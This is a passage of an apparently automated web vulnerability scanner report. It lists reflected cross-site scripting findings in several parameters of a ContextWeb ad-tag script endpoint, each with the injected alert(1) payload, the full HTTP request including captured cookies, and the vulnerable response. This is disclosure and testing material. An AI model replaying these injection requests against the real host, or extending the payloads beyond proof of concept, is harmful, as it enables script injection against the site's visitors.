function cw_Process(){try{var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="529848";var ct="88083";var cf="300X2509cbfc";alert(1)//0e17effbbec";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var
...[SNIP]...

1.223. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwheight request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4c0f"%3balert(1)//2577733fa41 was submitted in the cwheight parameter. This input was echoed as c4c0f";alert(1)//2577733fa41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=529848&cwwidth=300&cwheight=250c4c0f"%3balert(1)//2577733fa41&cwpnet=1&cwtagid=88083 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/tips
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CDSActionTracking6=rxYjeHcW6ZVB|GlchrMbA1MSR|516071|749|4426|42222|73391|56858|2|254|16|boston.com|2|8|1|0|2|1|2|DOTM5.CMST1.LOW21|1|1|0NHN21JG2RctrhRJEMBk_2cpxPqNqF8XjX2-c1AKWVc^|I|2qVT9|2BObB; cr=141|1|-8589018238111413015|1; FC1-WC=^54463_2_2v0tA; __utmz=57563192.1300142889.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _jsuid=9731344706080960861; __utma=57563192.1578638003.1300142889.1300142889.1300142889.1; V=GlchrMbA1MSR; cwbh1=2837%3B03%2F23%2F2011%3BRCQU1%3B03%2F28%2F2011%3BRCQU9%0A357%3B03%2F25%2F2011%3BEMON1%3B03%2F30%2F2011%3BEHEX1%0A2532%3B03%2F28%2F2011%3BAMQU1%0A1931%3B04%2F16%2F2011%3BFE479%3B04%2F06%2F2011%3BFE311%3B04%2F02%2F2011%3BFE655%0A996%3B04%2F05%2F2011%3BFACO1%0A2452%3B04%2F21%2F2011%3BTMHS1%0A749%3B04%2F03%2F2011%3BDOT23%0A2866%3B04%2F04%2F2011%3BSHME2%0A2863%3B04%2F20%2F2011%3BITUT5

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB22
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 01 Feb 2011 18:17:28 GMT
ETag: 2137648101
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5704
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Tue, 22 Mar 2011 22:04:04 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="529848";var ct="88083";var cf="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250c4c0f";alert(1)//2577733fa41";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window;var _cwu="undefined";var
...[SNIP]...

1.224. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwpid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e80c4"%3balert(1)//a8fe3b60eb9 was submitted in the cwpid parameter. This input was echoed as e80c4";alert(1)//a8fe3b60eb9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=529848e80c4"%3balert(1)//a8fe3b60eb9&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=88083 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/tips
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CDSActionTracking6=rxYjeHcW6ZVB|GlchrMbA1MSR|516071|749|4426|42222|73391|56858|2|254|16|boston.com|2|8|1|0|2|1|2|DOTM5.CMST1.LOW21|1|1|0NHN21JG2RctrhRJEMBk_2cpxPqNqF8XjX2-c1AKWVc^|I|2qVT9|2BObB; cr=141|1|-8589018238111413015|1; FC1-WC=^54463_2_2v0tA; __utmz=57563192.1300142889.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _jsuid=9731344706080960861; __utma=57563192.1578638003.1300142889.1300142889.1300142889.1; V=GlchrMbA1MSR; cwbh1=2837%3B03%2F23%2F2011%3BRCQU1%3B03%2F28%2F2011%3BRCQU9%0A357%3B03%2F25%2F2011%3BEMON1%3B03%2F30%2F2011%3BEHEX1%0A2532%3B03%2F28%2F2011%3BAMQU1%0A1931%3B04%2F16%2F2011%3BFE479%3B04%2F06%2F2011%3BFE311%3B04%2F02%2F2011%3BFE655%0A996%3B04%2F05%2F2011%3BFACO1%0A2452%3B04%2F21%2F2011%3BTMHS1%0A749%3B04%2F03%2F2011%3BDOT23%0A2866%3B04%2F04%2F2011%3BSHME2%0A2863%3B04%2F20%2F2011%3BITUT5

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB27
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 01 Feb 2011 18:17:28 GMT
ETag: 2109950108
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5704
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Tue, 22 Mar 2011 22:04:04 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="529848e80c4";alert(1)//a8fe3b60eb9";var ct="88083";var cf="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase(
...[SNIP]...

1.225. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwpnet request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 546d5"%3balert(1)//f902321b92e was submitted in the cwpnet parameter. This input was echoed as 546d5";alert(1)//f902321b92e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=529848&cwwidth=300&cwheight=250&cwpnet=1546d5"%3balert(1)//f902321b92e&cwtagid=88083 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/tips
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CDSActionTracking6=rxYjeHcW6ZVB|GlchrMbA1MSR|516071|749|4426|42222|73391|56858|2|254|16|boston.com|2|8|1|0|2|1|2|DOTM5.CMST1.LOW21|1|1|0NHN21JG2RctrhRJEMBk_2cpxPqNqF8XjX2-c1AKWVc^|I|2qVT9|2BObB; cr=141|1|-8589018238111413015|1; FC1-WC=^54463_2_2v0tA; __utmz=57563192.1300142889.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _jsuid=9731344706080960861; __utma=57563192.1578638003.1300142889.1300142889.1300142889.1; V=GlchrMbA1MSR; cwbh1=2837%3B03%2F23%2F2011%3BRCQU1%3B03%2F28%2F2011%3BRCQU9%0A357%3B03%2F25%2F2011%3BEMON1%3B03%2F30%2F2011%3BEHEX1%0A2532%3B03%2F28%2F2011%3BAMQU1%0A1931%3B04%2F16%2F2011%3BFE479%3B04%2F06%2F2011%3BFE311%3B04%2F02%2F2011%3BFE655%0A996%3B04%2F05%2F2011%3BFACO1%0A2452%3B04%2F21%2F2011%3BTMHS1%0A749%3B04%2F03%2F2011%3BDOT23%0A2866%3B04%2F04%2F2011%3BSHME2%0A2863%3B04%2F20%2F2011%3BITUT5

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB24
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 01 Feb 2011 18:17:28 GMT
ETag: -923268318
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5704
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Tue, 22 Mar 2011 22:04:04 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="529848";var ct="88083";var cf="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cn="1546d5";alert(1)//f902321b92e";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window;var _cwu="undefined";var _cwn=naviga
...[SNIP]...

1.226. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwrun request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 516e7"%3balert(1)//c92b78f2bd9 was submitted in the cwrun parameter. This input was echoed as 516e7";alert(1)//c92b78f2bd9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200516e7"%3balert(1)//c92b78f2bd9&cwadformat=300X250&cwpid=529848&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=88083 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/tips
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CDSActionTracking6=rxYjeHcW6ZVB|GlchrMbA1MSR|516071|749|4426|42222|73391|56858|2|254|16|boston.com|2|8|1|0|2|1|2|DOTM5.CMST1.LOW21|1|1|0NHN21JG2RctrhRJEMBk_2cpxPqNqF8XjX2-c1AKWVc^|I|2qVT9|2BObB; cr=141|1|-8589018238111413015|1; FC1-WC=^54463_2_2v0tA; __utmz=57563192.1300142889.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _jsuid=9731344706080960861; __utma=57563192.1578638003.1300142889.1300142889.1300142889.1; V=GlchrMbA1MSR; cwbh1=2837%3B03%2F23%2F2011%3BRCQU1%3B03%2F28%2F2011%3BRCQU9%0A357%3B03%2F25%2F2011%3BEMON1%3B03%2F30%2F2011%3BEHEX1%0A2532%3B03%2F28%2F2011%3BAMQU1%0A1931%3B04%2F16%2F2011%3BFE479%3B04%2F06%2F2011%3BFE311%3B04%2F02%2F2011%3BFE655%0A996%3B04%2F05%2F2011%3BFACO1%0A2452%3B04%2F21%2F2011%3BTMHS1%0A749%3B04%2F03%2F2011%3BDOT23%0A2866%3B04%2F04%2F2011%3BSHME2%0A2863%3B04%2F20%2F2011%3BITUT5

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB25
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 01 Feb 2011 18:17:28 GMT
ETag: 820981377
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5704
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Tue, 22 Mar 2011 22:04:04 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="529848";var ct="88083";var cf="300X250";var ca="VIEWAD";var cr="200516e7";alert(1)//c92b78f2bd9";var cw="300";var ch="250";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window
...[SNIP]...

1.227. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwtagid